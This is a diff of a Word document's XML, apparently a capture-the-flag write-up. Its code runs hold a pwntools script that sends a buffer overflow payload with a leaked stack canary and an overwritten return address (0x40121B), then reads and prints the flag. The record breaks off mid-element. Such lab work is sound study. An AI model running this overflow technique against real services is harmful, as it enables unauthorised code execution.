-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>40121B</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)) </w:t>
-      </w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(prompt):]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6088,7 +6022,7 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>io.shutdown()</w:t>
+        <w:t>io.recvline()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6104,6 +6038,204 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.send(cyclic(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(canary, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cyclic(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>40121B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6127,29 +6259,7 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">recieved </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> io.recvall().decode()</w:t>
+        <w:t>io.shutdown()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6165,72 +6275,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">flag </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> recieved.splitlines()[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>]</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6248,101 +6292,35 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>print</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'Flag 02: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">recieved </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> io.recvall().decode()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6358,6 +6336,356 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">flag </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> recieved.splitlines()[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Canary value: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">canary.decode().replace(linesep, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>" "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># just for fun</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Flag 02: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
